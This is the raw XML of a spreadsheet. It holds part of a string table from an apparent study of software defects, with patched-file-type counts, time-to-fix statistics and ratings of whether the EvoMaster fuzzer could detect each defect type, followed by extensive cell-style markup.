    <t>setOriginContentLength fails for files larger than 2.15GB due to integer overflow when parsing content length.</t>
  </si>
  <si>
    <t>#Patched Files</t>
  </si>
  <si>
    <t>Patch File Types Distribution</t>
  </si>
  <si>
    <t>{'source-file': 8, 'test-file': 6, 'data-file': 1, 'config-file': 1, 'ui-file': 1}</t>
  </si>
  <si>
    <t>{'source-file': 24, 'test-file': 9, 'other-file': 1, 'documentation-file': 1, 'config-file': 2, 'data-file': 5, 'ui-file': 1}</t>
  </si>
  <si>
    <t>{'source-file': 110, 'test-file': 44, 'config-file': 19, 'data-file': 14, 'documentation-file': 21, 'other-file': 8, 'ui-file': 10, 'database-file': 1, 'container-file': 1}</t>
  </si>
  <si>
    <t>{'test-file': 46, 'source-file': 126, 'data-file': 22, 'config-file': 13, 'other-file': 10, 'documentation-file': 17, 'ui-file': 12, 'container-file': 6, 'database-file': 1}</t>
  </si>
  <si>
    <t>{'test-file': 44, 'source-file': 88, 'data-file': 29, 'documentation-file': 28, 'database-file': 1, 'config-file': 11, 'other-file': 7, 'ui-file': 13, 'container-file': 1}</t>
  </si>
  <si>
    <t>{'source-file': 32, 'other-file': 2, 'documentation-file': 6, 'config-file': 4, 'data-file': 3, 'ui-file': 6, 'test-file': 8}</t>
  </si>
  <si>
    <t>{'source-file': 26, 'test-file': 8, 'documentation-file': 7, 'data-file': 4, 'other-file': 2, 'config-file': 3, 'ui-file': 7}</t>
  </si>
  <si>
    <t>{'test-file': 15, 'source-file': 36, 'documentation-file': 10, 'other-file': 4, 'config-file': 5, 'data-file': 5, 'ui-file': 3}</t>
  </si>
  <si>
    <t>{'test-file': 2, 'source-file': 3}</t>
  </si>
  <si>
    <t>{'source-file': 16, 'documentation-file': 3, 'test-file': 5, 'data-file': 3, 'other-file': 4, 'config-file': 4, 'ui-file': 2, 'container-file': 1}</t>
  </si>
  <si>
    <t>{'source-file': 37, 'test-file': 9, 'documentation-file': 8, 'config-file': 9, 'data-file': 6, 'other-file': 3, 'ui-file': 4, 'container-file': 2}</t>
  </si>
  <si>
    <t>{'source-file': 14, 'test-file': 7, 'documentation-file': 3, 'data-file': 6, 'config-file': 3, 'ui-file': 2, 'other-file': 3, 'container-file': 1}</t>
  </si>
  <si>
    <t>{'test-file': 3, 'source-file': 5, 'other-file': 1, 'documentation-file': 1}</t>
  </si>
  <si>
    <t>Time to fix (days)</t>
  </si>
  <si>
    <t>#defects</t>
  </si>
  <si>
    <t>sub defect type</t>
  </si>
  <si>
    <t>min</t>
  </si>
  <si>
    <t xml:space="preserve">max </t>
  </si>
  <si>
    <t xml:space="preserve">mean </t>
  </si>
  <si>
    <t>stdev</t>
  </si>
  <si>
    <t>EvoMaster Detection Feasibility</t>
  </si>
  <si>
    <t>Notes</t>
  </si>
  <si>
    <t>Unlikely</t>
  </si>
  <si>
    <t>Requires container/runtime config introspection; beyond tool’s scope</t>
  </si>
  <si>
    <t xml:space="preserve"> Partial</t>
  </si>
  <si>
    <t>May detect if failures result in bad HTTP responses; but not misconfigured workflows</t>
  </si>
  <si>
    <t>No</t>
  </si>
  <si>
    <t>Needs cross-environment execution, which EvoMaster doesn’t support</t>
  </si>
  <si>
    <t>Yes</t>
  </si>
  <si>
    <t>EvoMaster is strong at generating malformed/missing payloads</t>
  </si>
  <si>
    <t>EvoMaster can fuzz GET/query params to trigger such bugs</t>
  </si>
  <si>
    <t>Partial</t>
  </si>
  <si>
    <t>May work if auth is stubbed or hardcoded; fails if real token exchange is needed</t>
  </si>
  <si>
    <t>Requires managing long-term state and valid accounts</t>
  </si>
  <si>
    <t xml:space="preserve"> No</t>
  </si>
  <si>
    <t>External system failures (e.g., CI, middleware) aren't visible to EvoMaster</t>
  </si>
  <si>
    <t>EvoMaster cannot simulate or detect OS-level process issues</t>
  </si>
  <si>
    <t>Can detect if bad imports throw exceptions during API calls</t>
  </si>
  <si>
    <t>May detect if file upload fails visibly via API; deep file system access not tested</t>
  </si>
  <si>
    <t>Can detect permission errors if triggered via API endpoints</t>
  </si>
  <si>
    <t>EvoMaster works on a single-instance API; cluster coordination bugs are out-of-scope</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</si>
</sst>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b/>
      <sz val="11.0"/>
      <color rgb="FFFFFFFF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFB10202"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FFB10202"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF3F4528"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF1155CC"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF131D38"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF3F4528"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF0000FF"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <color rgb="FF434343"/>
      <name val="Roboto"/>
    </font>
    <font>
      <color rgb="FF3F4528"/>
      <name val="Roboto"/>
    </font>
    <font>
      <u/>
      <color rgb="FF434343"/>
      <name val="Roboto"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Roboto"/>
    </font>
    <font>
      <color rgb="FF131D38"/>
      <name val="Roboto"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF2A3243"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF434343"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF753800"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF434343"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF2C481F"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF133819"/>
      <name val="Aptos Narrow"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF2C481F"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <sz val="11.0"/>
      <color rgb="FF434343"/>
      <name val="Arial"/>
    </font>
    <font>
      <sz val="11.0"/>
      <color rgb="FF133819"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF434343"/>
      <name val="Roboto"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
    </font>
    <font>
      <color rgb="FF000000"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <color theme="1"/>
      <name val="Arial"/>
      <scheme val="minor"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
    </font>
    <font>
      <b/>
      <color theme="1"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF1155CC"/>
      <name val="Arial"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Roboto"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Roboto"/>
    </font>
    <font>
      <u/>
      <color rgb="FF0000FF"/>
      <name val="Roboto"/>
    </font>
  </fonts>
  <fills count="9">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8F9FA"/>
        <bgColor rgb="FFF8F9FA"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFFFF2CC"/>
        <bgColor rgb="FFFFF2CC"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF000000"/>
        <bgColor rgb="FF000000"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FF999999"/>
        <bgColor rgb="FF999999"/>
      </patternFill>
    </fill>
    <fill>
      <patternFill patternType="solid">
        <fgColor rgb="FFF3F3F3"/>
        <bgColor rgb="FFF3F3F3"/>
      </patternFill>
    </fill>
  </fills>
  <borders count="16">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1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="2" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="3" fillId="2" fontId="1" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="4" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="3" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="4" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="6" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="7" fillId="4" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFill="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="7" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="9" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="8" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="7" fillId="4" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="10" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="11" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="4" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="13" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="14" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="4" fillId="3" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="17" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="3" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="3" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="19" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="6" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="16" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="21" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="22" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="4" fillId="3" fontId="9" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="23" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="3" fontId="5" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="24" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="25" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="5" fillId="3" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="20" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="7" fillId="4" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="15" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="29" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="9" fillId="4" fontId="18" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="right" shrinkToFit="0" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="4" fontId="12" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="32" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="35" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyFont="1"/>
    <xf quotePrefix="1" borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="36" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="34" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="34" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="33" numFmtId="0" xfId="0" applyFill="1" applyFont="1"/>
    <xf borderId="0" fillId="7" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="33" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="7" fontId="34" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="7" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="31" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" wrapText="1"/>
    </xf>
    <xf borderId="0" fillId="6" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="1" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="33" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="2" fillId="0" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="3" fillId="0" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="left" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="4" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="38" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="6" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="10" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="39" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="11" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="12" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="13" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="14" fillId="0" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="14" fillId="0" fontId="40" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="14" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="15" fillId="0" fontId="30" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="33" numFmtId="0" xfId="0" applyFont="1"/>
    <xf borderId="0" fillId="5" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="5" fontId="37" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" vertical="bottom"/>
    </xf>
    <xf borderId="0" fillId="3" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="34" numFmtId="4" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFill="1" applyFont="1">
      <alignment readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="8" fontId="34" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
